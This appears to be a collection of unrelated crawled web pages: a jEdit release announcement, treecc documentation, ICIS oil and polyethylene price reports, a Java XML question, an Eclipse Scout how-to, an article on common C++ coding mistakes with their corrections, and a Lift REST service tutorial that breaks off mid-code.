+ Bug Fixes
- Fixed silly windows backup saving bug.
- Fixed minor problem when Control-clicking characters in the text area.
- A few printing bugs fixed, including the notorious print output spacing problem.

-- Slava Pestov

Salutations- This evening, I added five new releases to Plugin Central. Two of these are updates of tried-and-true plugins: FTP 0.4 and TextTools 1.8.1; the other three are new to Plugin Central: FastOpen 0.4.1 by Jiger Patel, JalopyPlugin 0.3.1 by Marco Hunsicker, and MementoPlugin 0.5.0 by Greg Cooper and Michael Taft. All require a 4.0-series version of jEdit.
* FastOpen 0.4.1: initial Plugin Central release; FastOpen is a plugin designed to quickly open any file in the current project by just typing in the first few characters of the filename you want to open; added ProjectSwitcher to allow switching ProjectViewer projects from FastOpen (Warren Nicholls); added Current Project to window title; FastOpen window is no longer modal (Ken Wootton); ProjectViewer is now kept open if it is already open (Ken Wootton); invalid filenames are now highlighted in red; use with multiple views is now supported; requires jEdit 4.0pre1, ProjectViewer 1.0.2, and JDK 1.3

* FTP 0.4: implements persistent connections; bug fixes; requires jEdit 4.0pre3 and JDK 1.3

* JalopyPlugin 0.3.1: initial Plugin Central release; Jalopy is a source code formatter/beautifier/pretty printer for the Sun Java programming language; requires jEdit 4.0final, ErrorList 1.2.1, and JDK 1.3; includes Jalopy 1.0b7

* MementoPlugin 0.5.0: initial Plugin Central release; Memento is a task manager/calendar application meant to function both as a stand-alone and as a jEdit plugin; requires jEdit 4.0final and JDK 1.4

* TextTools 1.8.1: column insert now beeps when there is no selection (Nathan Tenney); column inserts can now be undone in one step (Nathan Tenney); requires jEdit 4.0pre1 and JDK 1.3

-md
http://sourceforge.net/p/jedit/mailman/jedit-announce/?viewmonth=200206
Treecc input files consist of zero or more declarations that define nodes, operations, options, etc. The following sections describe each of these elements. Node types are defined using the ‘node’ keyword in input files. The general form of the declaration is: An identifier that is used to refer to the node type elsewhere in the treecc definition. It is also the name of the type that will be visible to the programmer in literal code blocks. An identifier that refers to the parent node type that ‘NAME’ inherits from. If ‘PNAME’ is not supplied, then ‘NAME’ is a top-level declaration. It is legal to supply a ‘PNAME’ that has not yet been defined in the input. Any combination of ‘%abstract’ and ‘%typedef’: The node type cannot be constructed by the programmer. In addition, the programmer does not need to define operation cases for this node type if all subtypes have cases associated with them. The node type is used as the common return type for node creation functions. Top-level declarations must have a ‘%typedef’ keyword. The ‘FIELDS’ part of a node declaration defines the fields that make up the node type. Each field has the following general form: The field is not used in the node's constructor. When the node is constructed, the value of this field will be undefined unless ‘VALUE’ is specified. The type that is associated with the field. Types can be declared using a subset of the C declaration syntax, augmented with some C++ and Java features. See section Types used in fields and parameters, for more information. The name to associate with the field. Treecc verifies that the field does not currently exist in this node type, or in any of its ancestor node types. The default value to assign to the field in the node's constructor. This can only be used on fields that are declared with ‘%nocreate’. The value must be enclosed in braces. For example ‘{NULL}’ would be used to initialize a field with ‘NULL’. 
The braces are required because the default value is expressed in the underlying source language, and can use any of the usual constant declaration features present in that language. When the output language is C, treecc creates a struct-based type called ‘NAME’ that contains the fields for ‘NAME’ and all of its ancestor classes. The type also contains some house-keeping fields that are used internally by the generated code. The following is an example: The programmer should avoid using any identifier that ends with ‘__’, because it may clash with house-keeping identifiers that are generated by treecc. When the output language is C++, Java, or C#, treecc creates a class called ‘NAME’, that inherits from the class ‘PNAME’. The field definitions for ‘NAME’ are converted into public members in the output. Types that are used in field and parameter declarations have a syntax which is subset of features found in C, C++, and Java: Types are usually followed by an identifier that names the field or parameter. The name is required for fields and is optional for parameters. For example ‘int’ is usually equivalent to ‘int x’ in parameter declarations. The following are some examples of using types: The grammar used by treecc is slightly ambiguous. The last example above declares a parameter called ‘Element’, that has type ‘const’. The programmer probably intended to declare an anonymous parameter with type ‘const Element’ instead. This ambiguity is unavoidable given that treecc is not fully aware of the underlying language's type system. When treecc sees a type that ends in a sequence of identifiers, it will always interpret the last identifier as the field or parameter name. Thus, the programmer must write the following instead: Treecc cannot declare types using the full power of C's type system. The most common forms of declarations are supported, and the rest can usually be obtained by defining a ‘typedef’ within a literal code block. 
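Tying the node and field syntax described above together, the following is a hedged sketch of a small expression hierarchy; the identifiers ('expression', 'type_code', 'int_type', and so on) are illustrative and not prescribed by treecc:

```
%node expression %abstract %typedef =
{
    %nocreate type_code type = {int_type};
}

%node binary expression %abstract =
{
    expression *expr1;
    expression *expr2;
}

%node plus binary
%node minus binary
```

Here 'expression' is the top-level '%typedef' type, 'binary' adds two child-node fields, and 'plus'/'minus' are concrete leaf node types. The 'type' field is declared '%nocreate', so it is not a constructor parameter and is initialized from the braced default value instead.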
See section Literal code declarations, for more information on literal code blocks. It is the responsibility of the programmer to use type constructs that are supported by the underlying programming language. Types such as ‘const char *’ will give an error when the output is compiled with a Java compiler, for example. Enumerated types are a special kind of node type that can be used by the programmer for simple values that don't require a full abstract syntax tree node. The following is an example of defining a list of the primitive machine types used in a Java virtual machine: Enumerations are useful when writing code generators and type inferencing routines. The general form is: An identifier to be used to name the enumerated type. The name must not have been previously used as a node type, an enumerated type, or an enumerated value. A comma-separated list of identifiers that name the values within the enumeration. Each of the names must be unique, and must not have been used previously as a node type, an enumerated type, or an enumerated value. Logically, each enumerated value is a special node type that inherits from a parent node type corresponding to the enumerated type ‘NAME’. When the output language is C or C++, treecc generates an enumerated typedef for ‘NAME’ that contains the enumerated values in the same order as was used in the input file. The typedef name can be used elsewhere in the code as the type of the enumeration. When the output language is Java, treecc generates a class called ‘NAME’ that contains the enumerated values as integer constants. Elsewhere in the code, the type ‘int’ must be used to declare variables of the enumerated type. Enumerated values are referred to as ‘NAME.VALUE’. If the enumerated type is used as a trigger parameter, then ‘NAME’ must be used instead of ‘int’: treecc will convert the type when the Java code is output. 
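The JVM-style enumeration mentioned above might be declared like this (a hedged sketch; the value names are illustrative):

```
%enum JavaType =
{
    JT_BYTE,
    JT_SHORT,
    JT_CHAR,
    JT_INT,
    JT_LONG,
    JT_FLOAT,
    JT_DOUBLE,
    JT_OBJECT_REF
}
```

In C and C++ output this becomes an enumerated typedef named 'JavaType'; in Java output the values become integer constants referred to as 'JavaType.JT_INT' and so on, as described above.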
When the output language is C#, treecc generates an enumerated value type called ‘NAME’ that contains the enumerated values as members. The C# type ‘NAME’ can be used elsewhere in the code as the type of the enumeration. Enumerated values are referred to as ‘NAME.VALUE’. Operations are declared in two parts: the declaration, and the cases. The declaration part defines the prototype for the operation and the cases define how to handle specific kinds of nodes for the operation. Operations are defined over one or more trigger parameters. Each trigger parameter specifies a node type or an enumerated type that is selected upon to determine what course of action to take. The following are some examples of operation declarations: Trigger parameters are specified by enclosing them in square brackets. If none of the parameters are enclosed in square brackets, then treecc assumes that the first parameter is the trigger. The general form of an operation declaration is as follows: Specifies that the operation is associated with a node type as a virtual method. There must be only one trigger parameter, and it must be the first parameter. Non-virtual operations are written to the output source files as global functions. Optimise the generation of the operation code so that all cases are inline within the code for the function itself. This can only be used with non-virtual operations, and may improve code efficiency if there are lots of operation cases with a small amount of code in each. Split the generation of the multi-trigger operation code across multiple functions, to reduce the size of each individual function. It is sometimes necessary to split large %inline operations to avoid compiler limits on function size. The type of the return value for the operation. This should be ‘void’ if the operation does not have a return value. The name of the class to place the operation's definition within. 
This can only be used with non-virtual operations, and is intended for languages such as Java and C# that cannot declare methods outside of classes. The class name will be ignored if the output language is C. If a class name is required, but the programmer did not supply it, then ‘NAME’ will be used as the default. The exception to this is the C# language: ‘CLASS’ must always be supplied and it must be different from ‘NAME’. This is due to a "feature" in some C# compilers that forbid a method with the same name as its enclosing class. The name of the operation. The parameters to the operation. Trigger parameters may be enclosed in square brackets. Trigger parameters must be either node types or enumerated types. Once an operation has been declared, the programmer can specify its cases anywhere in the input files. It is not necessary that the cases appear after the operation, or that they be contiguous within the input files. This permits the programmer to place operation cases where they are logically required for maintenance reasons. There must be sufficient operation cases defined to cover every possible combination of node types and enumerated values that inherit from the specified trigger types. An operation case has the following general form: The name of the operation for which this case applies. A comma-separated list of node types or enumerated values that define the specific case that is handled by the following code. Source code in the output source language that implements the operation case. Multiple trigger combinations can be associated with a single block of code, by listing them all, separated by commas. For example: "(*)" is used below to indicate an option that is enabled by default. Enable the generation of code that can track the current filename and line number when nodes are created. See section Tracking line numbers in source files, for more information. (*) Disable the generation of code that performs line number tracking.
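As a hedged sketch of an operation declaration with multi-trigger cases (the node names follow the illustrative expression-hierarchy style; 'common_type' is a hypothetical helper, not part of treecc):

```
%operation void infer_type(expression *e)

infer_type(plus),
infer_type(minus)
{
    infer_type(e->expr1);
    infer_type(e->expr2);
    e->type = common_type(e->expr1->type, e->expr2->type);
}
```

The two case headers are separated by a comma and share one block of code, so 'plus' and 'minus' nodes are handled identically; further cases for the remaining node types could be placed in any input file.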
Optimise the creation of singleton node types. These are node types without any fields. Treecc can optimise the code so that only one instance of a singleton node type exists in the system. This can speed up the creation of nodes for constants within compilers. (*) Singleton optimisations will have no effect if ‘track_lines’ is enabled, because line tracking uses special hidden fields in every node. Disable the optimisation of singleton node types. Enable the generation of reentrant code that does not rely upon any global variables. Separate copies of the compiler state can be used safely in separate threads. However, the same copy of the compiler state cannot be used safely in two or more threads. Disable the generation of reentrant code. The interface to node management functions is simpler, but cannot be used in a threaded environment. (*) Force output source files to be written, even if they are unchanged. This option can also be set using the ‘-f’ command-line option. Don't force output source files to be written if they are the same as before. (*) This option can help smooth integration of treecc with make. Only those output files that have changed will be modified. This reduces the number of files that the underlying source language compiler must process after treecc is executed. Use virtual methods in the node type factories, so that the programmer can subclass the factory and provide new implementations of node creation functions. This option is ignored for C, which does not use factories. Don't use virtual methods in the node type factories. (*) Use abstract virtual methods in the node type factories. The programmer is responsible for subclassing the factory to provide node creation functionality. Don't use abstract virtual methods in the node type factories. (*) Put the kind field in the node, for more efficient access at runtime. (*) Put the kind field in the vtable, and not the node. 
This saves some memory, at the cost of slower access to the kind value at runtime. This option only applies when the language is C. The kind field is always placed in the node in other languages, because it isn't possible to modify the vtable. Specify the prefix to be used in output files in place of "yy". Specify the name of the state type. The state type is generated by treecc to perform centralised memory management and reentrancy support. The default value is ‘YYNODESTATE’. If the output language uses factories, then this will also be the name of the factory base class. Specify the namespace to write definitions to in the output source files. This option is ignored when the output language is C. Same as ‘%option namespace = NAME’. Provided because ‘package’ is more natural for Java programmers. Specify the numeric base to use for allocating numeric values to node types. By default, node type allocation begins at 1. Specify the output language. Must be one of "C", "C++", "Java", "C#", "Ruby", "PHP", or "Python". The default is "C". Specify the size of the memory blocks to use in C and C++ node allocators. Strip filenames down to their base name in #line directives, i.e., strip off the directory component. This can be helpful in combination with the %include %readonly command when treecc input files may be processed from different directories, causing common output files to change unexpectedly. Don't strip filenames in #line directives. (*) Use internal as the access mode for classes in C#, rather than public. Use public as the access mode for classes in C#, rather than internal. (*) Print #line markers in languages that use them. (*) Do not print #line markers, even in languages that normally use them. Use treecc's standard node allocator for C and C++. This option has no effect for other output languages. (*) Do not use treecc's standard node allocator for C and C++. This can be useful when the programmer wants to redirect node allocation to their own routines.
Use libgc as a garbage-collecting node allocator for C and C++. This option has no effect for other output languages. Do not use libgc as a garbage-collecting node allocator for C and C++. (*) Specify the base type for the root node of the treecc node hierarchy. The default is no base type. Sometimes it is necessary to embed literal code within output ‘.h’ and source files. Usually this is to ‘#include’ definitions from other files, or to define functions that cannot be easily expressed as operations. A literal code block is specified by enclosing it in ‘%{’ and ‘%}’. The block can also be prefixed with the following flags: Write the literal code to the currently active declaration header file, instead of the source file. Write the literal code to both the currently active declaration header file and the currently active source file. Write the literal code to the end of the file, instead of the beginning. Another form of literal code block is one which begins with ‘%%’ and extends to the end of the current input file. This form implicitly has the ‘%end’ flag. Most treecc compiler definitions will be too large to be manageable in a single input file. They also will be too large to write to a single output file, because that may overload the source language compiler. Multiple input files can be specified on the command-line, or they can be explicitly included by other input files with the following declarations: Include the contents of the specified file at the current point within the current input file. ‘FILENAME’ is interpreted relative to the name of the current input file. If the ‘%readonly’ keyword is supplied, then any output files that are generated by the included file must be read-only. That is, no changes are expected by performing the inclusion. The ‘%readonly’ keyword is useful for building compilers in layers. The programmer may group a large number of useful node types and operations together that are independent of the particulars of a given language.
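A hedged sketch of literal code blocks using the flags described above (the flag names '%decls' and the included headers are assumptions based on common treecc usage, and the contents are illustrative):

```
%decls %{
/* written to the currently active declaration header file */
#include <stdlib.h>
%}

%{
/* written to the currently active source file */
#include "helpers.h"
%}
```

A block prefixed for both files would go to the header and the source file, and an '%end'-flagged block is emitted at the end of its file rather than the beginning; a block opened with '%%' runs to the end of the input file and is implicitly end-flagged.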
The programmer then defines language-specific compilers that "inherit" the common definitions. Read-only inclusions ensure that any extensions that are added by the language-specific parts do not "leak" into the common code. Output files can be changed using the following declarations: Change the currently active declaration header file to ‘FILENAME’, which is interpreted relative to the current input file. This option has no effect for languages without header files (Java and C#). Any node types and operations that are defined after a ‘%header’ declaration will be declared in ‘FILENAME’. Change the currently active source file to ‘FILENAME’, which is interpreted relative to the current input file. This option has no effect for languages that require a single class per file (Java). Any node types and operations that are defined after an ‘%output’ declaration will have their implementations placed in ‘FILENAME’. Change the output source directory to ‘DIRNAME’. This is only used for Java, which requires that a single file be used for each class. All classes are written to the specified directory. By default, ‘DIRNAME’ is the current directory where treecc was invoked. When treecc generates the output source code, it must insert several common house-keeping functions and classes into the code. By default, these are written to the first header and source files. This can be changed with the ‘%common’ declaration: Output the common house-keeping code to the currently active declaration header file and the currently active source file. This is typically used as follows: This document was generated by Klaus Treichel on January 18, 2009 using texi2html 1.78.
http://www.gnu.org/software/dotgnu/treecc/treecc_4.html
17 August 2012 07:18 [Source: ICIS news] SINGAPORE (ICIS)--Crude futures declined on Friday, with ICE Brent futures falling more than $1/bbl amid news that the US Government is considering releasing supplies from its strategic oil reserves, while comments from the Israeli President eased supply concerns.

At 05:48 GMT, October Brent crude futures and September NYMEX light sweet crude futures (WTI) were both trading lower, with WTI at $95.10/bbl, down by 50 cents/bbl from the previous close.

The US Government is reviewing the possibility of releasing supplies from its strategic reserves amid concerns that a rise in gasoline prices is having a negative impact on the economy and reducing the effectiveness of sanctions against

Supply concerns also eased after Israeli President Peres indicated that his country would not pursue unilateral military action against

However, tensions with western powers and its Arab neighbours over its nuclear programme have resulted in a tightening of sanctions against

Oil prices have risen to their highest level since early May 2012 amid supply concerns generated by heightened Middle East tensions resulting from the Iranian nuclear crisis and the ongoing civil war in

Brent prices have also climbed amid field maintenance which has reduced supplies
http://www.icis.com/Articles/2012/08/17/9587848/crude-falls-by-over-1bbl-on-us-potential-oil-reserves.html
Hi,

I have an XML document that looks like this:

<document>
  <attribute type="country">Singapore</attribute>
  <attribute type="continent">Asia</attribute>
</document>

I would like to unmarshal this into a Java object that is as follows:

public class LocationDocument {
    /* accessors omitted */
    public String country;
    public String continent;
}

Best Regards
Rao (Peruri Rama Mohan Rao)
T&O-ES-Imaging & Workflow
Tel: 65-6878 2071
Mobile: 65-9389 7141
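One possible approach to the mapping asked about above is a plain JAXP/DOM sketch (this is not XMLBeans-specific; the class and method names here are illustrative assumptions): each <attribute> element's 'type' attribute is matched against a field name.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

public class LocationParser {

    public static class LocationDocument {
        public String country;
        public String continent;
    }

    // Maps each <attribute type="..."> element onto the matching field.
    public static LocationDocument parse(String xml) throws Exception {
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new InputSource(new StringReader(xml)));
        LocationDocument result = new LocationDocument();
        NodeList attrs = doc.getDocumentElement().getElementsByTagName("attribute");
        for (int i = 0; i < attrs.getLength(); i++) {
            Element e = (Element) attrs.item(i);
            String type = e.getAttribute("type");
            String value = e.getTextContent();
            if ("country".equals(type)) {
                result.country = value;
            } else if ("continent".equals(type)) {
                result.continent = value;
            }
        }
        return result;
    }

    public static void main(String[] args) throws Exception {
        String xml = "<document>"
                + "<attribute type=\"country\">Singapore</attribute>"
                + "<attribute type=\"continent\">Asia</attribute>"
                + "</document>";
        LocationDocument loc = parse(xml);
        System.out.println(loc.country + " / " + loc.continent);
    }
}
```

With XMLBeans itself one would normally compile a schema and use the generated types instead; the DOM version above simply shows the element-to-field mapping directly.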
http://mail-archives.apache.org/mod_mbox/xmlbeans-user/200609.mbox/%3CBF158E64FBA6984BABB0A3D80C83B25605893D5D@W01G1BNKMBX01Y.reg1.1bank.dbs.com%3E
Scout/HowTo/3.9

There are several default mappings defined:

registerPart(IForm.VIEW_ID_OUTLINE, OutlineView.class.getName());
registerPart(IForm.VIEW_ID_PAGE_DETAIL, DetailView.class.getName());
...
registerPart(IForm.VIEW_ID_PAGE_SEARCH, SearchView.class.getName());
registerPart(IForm.VIEW_ID_E, EastView.class.getName());

Only the mapped displayViewIds will work out of the box. To map other IDs, use the extension point org.eclipse.ui.perspectiveExtensions. Since this is pure Eclipse RCP and has nothing to do with Scout, it won't be explained in this HowTo. As a start, you can have a look at the already existing perspective extensions for the built-in views.

Opening the views

Basically, opening a view is the same as opening a dialog; you only have to open the form with the appropriate form handler. That's it!

Opening the views in exclusive mode

What you need to be aware of is that the user now has the possibility to open the same form multiple times, and even the same record. To make sure that modifying the same record does not open two different views but activates the already opened one instead, you need to start the form in exclusive mode and compute an exclusive key. The following code shows how to achieve this:

public class DesktopForm extends AbstractForm {

  public class ViewHandler extends AbstractFormHandler {
    @Override
    protected void execLoad() throws ProcessingException {
      // open form code
    }

    @Override
    protected boolean getConfiguredOpenExclusive() {
      return true;
    }
  }

  public void startView() throws ProcessingException {
    startInternalExclusive(new DesktopForm.ViewHandler());
  }

  @Override
  public Object computeExclusiveKey() throws ProcessingException {
    return YOUR_EXCLUSIVE_KEY;
  }
}

The exclusive key (YOUR_EXCLUSIVE_KEY) is typically the primary key of the entity, but it doesn't have to be. With this enhancement, opening forms with different exclusive keys leads to multiple views, and opening forms with the same exclusive key leads to only one view.
Setting the property allowMultiple (SWT)

If you would like to start your view multiple times, you need to set the property allowMultiple of your ViewPart to true. This makes sure that a secondaryViewId is generated every time you open the view. Otherwise only one instance of the view is possible, and opening the form leads to a warning similar to this:

!MESSAGE org.eclipse.scout.rt.ui.swt.window.desktop.view.AbstractScoutView.showForm(null:-1) The view 'ID=org.eclipse.scout.demo.view.ui.swt.views.CenterView' is already open. The form 'Center (org.eclipse.scout.demo.view.client.ui.forms.DesktopForm)' can not be opened!

Demo Project

The demo project consists of three views: the main desktop view, a bottom view and a right view.
http://wiki.eclipse.org/index.php?title=Scout/HowTo/3.9/Open_a_Form_in_a_View&oldid=342250
I find an interesting phenomenon occurring in the world nowadays. What happens when a software development department turns into a secondary entity not closely related to the company's basic area of activity? A forest reserve appears. However significant and critical the company's area of activity may be (say, medicine or military equipment), a small swamp appears anyway, where new ideas get stuck and 10-year-old technologies are in use.

Here are a couple of extracts from the correspondence of a man working in the software development department at some nuclear power plant:

And then he says, "What for do we need git? Look here, I've got it all written down in my paper notebook."
...
And do you have any version control at all?
2 men use git. The rest of the team use numbered zip's at best. Though it's only 1 person with zip's I'm sure about.

Don't be scared. Software developed at nuclear power plants may serve different purposes, and no one has abolished hardware security yet. In that particular department, people collect and process statistical data. Yet the tendency toward swamping is pretty obvious. I don't know why it happens, but the fact is certain. What's interesting is that the larger the company, the more intense the swamping effect.

I want to point out that stagnation in large companies is an international phenomenon. Things are quite the same abroad. There is an article on the subject, but I don't remember its title. I spent quite a time trying to find it, but in vain. If somebody knows it, please give me the link so that I can post it. In that article, a programmer tells a story about having worked at some military department. It was - naturally - awfully secret and bureaucratic - so much so that it took them several months to agree on which level of access permissions he could be granted to work on his computer. As a result, he was writing a program in Notepad (without compiling it) and was soon fired for inefficiency.
Now let's get back to our ex-colleague. Having come to his new office, he was struck with kind of a cultural shock. You see, after spending so much time and effort on studying and working with static analysis tools, it's very painful to watch people ignore even compiler warnings. It's just like a separate world where they program according to their own canons and even use their own terms. The man told me some stories about it, and most of all I liked the phrase "grounded pointers" common among the local programmers. See how close they are to the hardware aspect?

We are proud of having raised inside our team a skilled specialist who cares about code quality and reliability. He hasn't silently accepted the established situation; he is trying to improve it. As a start, he did the following: he studied the compiler warnings, then checked the project with Cppcheck, and considered preventing typical mistakes in addition to making some fixes.

One of his first steps was preparing a paper aimed at improving the quality of the code created by the team. Introducing and integrating a static code analyzer into the development process might be the next step. It will certainly not be PVS-Studio: first, they work under Linux; second, it's very difficult to sell a software product to such companies. So, he has chosen Cppcheck for now. This tool is very fine for people to get started with the static analysis methodology.

I invite you to read the paper he has prepared. It is titled "The Way You Shouldn't Write Programs". Many of the items may look like they were written in Captain Obvious style. However, these are real problems the man tries to address.

Ignoring compiler warnings. When there are many of them in the list, you risk easily missing genuine errors in recently written code. That's why you should address them all.
In the conditional statement of the 'if' operator, a variable is assigned a value instead of being tested for this value:

if (numb_numbc[i] = -1) { }

The code compiles well in this case, but the compiler produces a warning. The correct code is shown below:

if (numb_numbc[i] == -1) { }

The statement "using namespace std;" written in header files may pull this namespace into every file which includes this header, which in turn may lead to calling wrong functions or to name collisions.

Comparing signed variables to unsigned ones. Keep in mind that mixing signed and unsigned variables may result in comparisons that never behave as intended. For example, a loop condition such as 'i <= ba.size() - 1' incorrectly handles the situation of the 'ba' array being empty: the expression "ba.size() - 1" evaluates to an unsigned size_t value, and if the array contains no items, the expression evaluates to 0xFFFFFFFFu.

Neglecting usage of constants may lead to overlooking hard-to-eliminate bugs, e.g. when the '=' operator is mistakenly used instead of '=='. If the 'str' variable were declared as a constant, the compiler would not even compile the code.

Pointers to strings are compared instead of strings themselves. Even if the string "S" is stored in the variable TypeValue, the comparison will always return 'false'. The correct way to compare strings is to use the special functions 'strcmp' or 'strncmp'.

Buffer overflow:

memset(prot.ID, 0, sizeof(prot.ID) + 1);

This code may cause several bytes of the memory area right after 'prot.ID' to be cleared as well. Don't mix up sizeof() and strlen(). The sizeof() operator returns the complete size of an item in bytes. The strlen() function returns the string length in characters (without counting the null terminator).

Buffer underflow: when writing 'memset(ptr, 0, sizeof(ptr))', only N bytes will be cleared instead of the whole '*ptr' structure (N is the pointer size on the current platform).
The correct way is to use the following code:

memset(ptr, 0, sizeof(*ptr));

Incorrect expression:

if (0 < L < 2 * M_PI) { }

The compiler doesn't see any error here, yet the expression is meaningless: executing it always yields a constant 'true' or 'false', with the exact result depending on the comparison operators and boundary conditions. The compiler generates a warning for such expressions. The correct version of this code is:

if (0 < L && L < 2 * M_PI) { }

Unsigned variables cannot be less than zero.

Comparing a variable to a value it can never reach; the compiler produces warnings against such things.

Memory is allocated with the help of 'new' or 'malloc' but is never freed through 'delete'/'free' correspondingly.

Memory is allocated through 'new[]' and freed through 'delete'. Or, vice versa, memory is allocated through 'new' and freed through 'delete[]'.

Using uninitialized variables. In C/C++, variables are not initialized to zero by default. Sometimes code only seems to run well, which is not so - it's merely luck.

A function returns a reference or pointer to local objects. On leaving the function, 'FileName' will refer to an already freed memory area, since all the local objects are created on the stack, so it's impossible to handle it correctly any further.

Values returned by functions are not checked, while they may return an error code or '-1' in case of an error. It may happen that a function returns an error code and we continue working without noticing or reacting to it in any way, which results in a sudden program crash at some point. Such defects take much time to debug.

Neglecting usage of special static and dynamic analysis tools, as well as creation and usage of unit tests.
Being too sparing with parentheses in math expressions results in errors like the following:

D = ns_vsk.bit.D_PN_ml + (int)(ns_vsk.bit.D_PN_st) << 16;

In this case, addition is executed first and only then the left shift. See "Operation priorities in C/C++". Judging by the program logic, the order the operations must be executed in is quite the reverse: shift first, then addition.

A similar error occurs in the following fragment: the programmer forgot to enclose the TYPE macro in parentheses. This results in first executing the 'type & A' expression and only then the '(type & A) | B' expression. As a consequence, the condition is always true.

Array index out of bounds. The 'mas[3] = 4;' expression addresses a non-existing array item, since it follows from the declaration of the 'int mas[N]' array that its items can be indexed within the range [0...N-1].

Priorities of the logical operations '&&' and '||' are mixed up. The '&&' operator has a higher priority, so in this condition:

if (A || B && C) { }

'B && C' will be executed first, while the rest of the expression will be evaluated after that. This may not conform to the required execution logic. It's often assumed that logical expressions are executed from left to right. The compiler generates warnings for such suspicious fragments.

An assigned value will have no effect outside the function: the pointer 'a' cannot be assigned a different address value. To do that, you need to declare the function in the following way:

void foo(int *&a, int b) {....}

or:

void foo(int **a, int b) {....}
The area of programming is developing very fast. As a result, those who are constantly "working at work" fail to keep track of contemporary tendencies and tools in the industry. They eventually grow to work much less efficiently than freelance programmers and programmers engaged in startups and small companies. Thus we get a strange situation: a young freelancer can do his work better (because he has the knowledge: TDD, continuous integration, static analysis, version control systems, and so on) than a programmer who has worked for 10 years at Russian Railways/a nuclear power plant/… (add your variant of some large enterprise). Thank God, it's by far not always like that. But still it happens. Why am I feeling sad about this? I wish we could sell PVS-Studio to them. But they don't even have the slightest suspicion of the existence and usefulness of such tools. :)
http://www.cplusplus.com/articles/91wTURfi/
CC-MAIN-2015-06
en
refinedweb
26 August 2009 23:59 [Source: ICIS news] LONDON (ICIS news)--Polyethylene (PE) prices have strengthened this week due to tight supply and import pressure in both northern and southern Africa, market participants said on Wednesday. According to global chemical market intelligence service ICIS pricing, low density PE (LDPE) prices were assessed at $1,290-1,310/tonne (€903-917/tonne) CFR northern Africa. Linear low density PE (LLDPE) was assessed at $1,260-1,280/tonne CFR, while high density PE (HDPE) was at $1,280-1,300/tonne CFR, up by $10-30/tonne from last week, according to ICIS pricing. “The increases are a result of continuing tight supply of PE in the region,” said a buyer and a seller. In southern Africa, LDPE was assessed at $1,330-1,380/tonne, LLDPE at $1,260-1,340/tonne and HDPE at $1,300-1,320/tonne, all on a CFR (cost and freight) southern Africa basis. “This is as a result of reduced availability and pressure from Middle Eastern suppliers to push up export values,” a source said. Domestic South African PE prices rose by Rand (R) 100-200/tonne ($13-26/tonne) this week. LDPE prices were assessed at R11,600-12,700/tonne, LLDPE at R11,400-12,700/tonne and HDPE at R11,900-12,500/tonne. All prices were on an FD (free delivered) South Africa basis. “This is a consequence of the ongoing ethylene shortage and higher priced imports coming in,” a trader said. ($1 = €0.70; $1 = R7.80) For more on polyethylene visit ICIS.
http://www.icis.com/Articles/2009/08/26/9243071/pe-firms-across-africa-due-to-tight-supply-import-pressure.html
Creating a REST Service with Lift Lift provides helpers that make it easy to create a REST service with just a few lines of code. I'll provide a simple example that doesn't consider security issues. However, the required authentication checking can be added with just a few additional lines of code. This sample REST service involves games: it must list all the games, and return a specific game by its ID. The restapi/game/list URI must display all the games, and if there is a long parameter with an ID such as restapi/game/list/1, the service must find this game by ID and return the results. The following listing shows the code for a new GameInformation.scala file that defines the GameInformation case class and a Singleton object with the same name. Notice that the code is included in the code.model package, which is the default package for models based on the rules I defined in Boot.scala in the previous article. You must place the file in src/main/scala. The GameInformation object defines games as a List of three GameInformation instances to include sample data to make it easy to test the REST service. The find method returns a Box[GameInformation] with a GameInformation instance when one element in the games List matches the ID received as a parameter. package code package model import net.liftweb._ import util._ import Helpers._ import common._ case class GameInformation(id: Long, name: String, highestScore: Long) object GameInformation { var games = List( new GameInformation(1, "Invaders 2013", 7200), new GameInformation(2, "Candy Crush", 32500), new GameInformation(3, "Angry Birds", 155500)) def find(id: Long): Box[GameInformation] = synchronized { games.find(_.id == id) } } Now that I have the necessary model, I can use it in a Singleton object named GameRest, which holds the code to process and respond to the API calls. 
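Stripped of Lift's Box type, the find-by-id pattern is plain Scala. A standalone sketch using Option in place of Box (which Lift converts between implicitly):

```scala
case class GameInformation(id: Long, name: String, highestScore: Long)

object GameStore {
  val games = List(
    GameInformation(1, "Invaders 2013", 7200),
    GameInformation(2, "Candy Crush", 32500),
    GameInformation(3, "Angry Birds", 155500))

  // Option here stands in for Lift's Box: Some on a hit, None otherwise.
  def find(id: Long): Option[GameInformation] =
    games.find(_.id == id)
}
```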
GameRest extends RestHelper and makes use of Scala's pattern matching to match incoming HTTP requests, extract the required values as part of the pattern matching process, and return the results with the necessary conversions. Notice that the code is included in the code.lib package, which is the default package for a REST API in Lift. You must place the file in src/main/scala. package code package lib import model._ import net.liftweb._ import net.liftweb.http._ import net.liftweb.http.rest._ import net.liftweb.util._ import common._ import http._ import rest._ import json._ import scala.xml._ import util._ import Helpers._ import js.JsCmds._ object GameRest extends RestHelper { serve { case "restapi" :: "game" :: "list" :: Nil Get _ => anyToJValue(listAllGames) case "restapi" :: "game" :: "list" :: AsLong(id) :: Nil Get _ => anyToJValue(listGame(id)) } def listAllGames(): List[GameInformation] = { GameInformation.games.map { game => GameInformation( game.id, game.name, game.highestScore) } } def listGame(id: Long): Box[GameInformation] = { for { game <- GameInformation.find(id) ?~ "The requested game doesn't exist" } yield GameInformation( game.id, game.name, game.highestScore) } } When Lift receives an HTTP request, it tests a PartialFunction[net.liftweb.http.Req, () => Box[net.liftweb.http.LiftResponse]] to check whether it is defined. If Lift finds a match, it takes the resulting function and applies it to get a Box[net.liftweb.http.LiftResponse], then returns it when it is full. The serve method defines the request handlers: restapi/game/list with no additional values calls the listAllGames method. restapi/game/list/{id}, where {id} is a long value with the desired id, calls the listGame method with the received id as a parameter. For example, restapi/game/list/2 calls listGame(2). The anyToJValue method is a helper method that creates JSON from case classes. 
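The path matching that serve performs is ordinary Scala list pattern matching. A standalone sketch, with a simplified stand-in for Lift's AsLong extractor (the routing strings mirror the article's URIs), behaves like this:

```scala
// Simplified stand-in for Lift's AsLong extractor: matches only
// segments that parse as a Long.
object AsLong {
  def unapply(s: String): Option[Long] =
    scala.util.Try(s.toLong).toOption
}

object PathMatchDemo {
  // Route a request path, already split into segments, the way
  // the serve {} block does.
  def route(path: List[String]): String = path match {
    case "restapi" :: "game" :: "list" :: Nil               => "all games"
    case "restapi" :: "game" :: "list" :: AsLong(id) :: Nil => s"game $id"
    case _                                                  => "not found"
  }

  def main(args: Array[String]): Unit = {
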